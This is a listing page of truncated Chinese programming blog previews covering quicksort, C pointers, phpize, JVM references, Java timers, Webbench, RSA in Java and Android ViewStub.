    public void quickSort(int[] array){ this.quickSort(array, 0, array.length - 1); } public void quickSort(int[] array,int left,int right){ if(right - left <= 0
  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节 dcj3sjt126com C语言
    # include <stdio.h> int main(void) { /* 1、一个变量的地址只用第一个字节表示 2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了 3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节, 但是这些字节比较多,所以编号就比较大,
  • phpize使用方法 dcj3sjt126com PHP
    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下 安装(fastcgi模式)的时候,常常有这样一句命令: 代码如下: /usr/local/webserver/php/bin/phpize   一、phpize是干嘛的? phpize是什么? phpize是用来扩展php扩展模块的,通过phpi
  • Java虚拟机学习 - 对象引用强度 shuizhaosi888 JAVA虚拟机
    本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处! 无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。 引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址 happyqing .net下载framework
      Microsoft .NET Framework 3.5 Service Pack 1(完整软件包)  http://www.microsoft.com/zh-cn/download/details.aspx?id=25150 Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
  • JAVA定时器的使用 jingjing0907 javatimer线程定时器
    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。 对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。 privatejava.util.Timer timer; timer = newTimer(true); timer.schedule( newjava.util.TimerTask() { public void run()
  • Webbench 流浪鱼 webbench
    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。 Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
  • 第11章 动画效果(中) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • windows下制作bat启动脚本. sanyecao2314 javacmd脚本bat
    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart
  • Java进行RSA加解密的例子 tomcat_oracle java
    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。   数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。   对称加密指的是发送者和接收者共用同一个密钥的加解密方法。   非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
  • Android_ViewStub 阿尔萨斯 ViewStub
    public final class ViewStub extends View java.lang.Object android.view.View android.view.ViewStub 类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他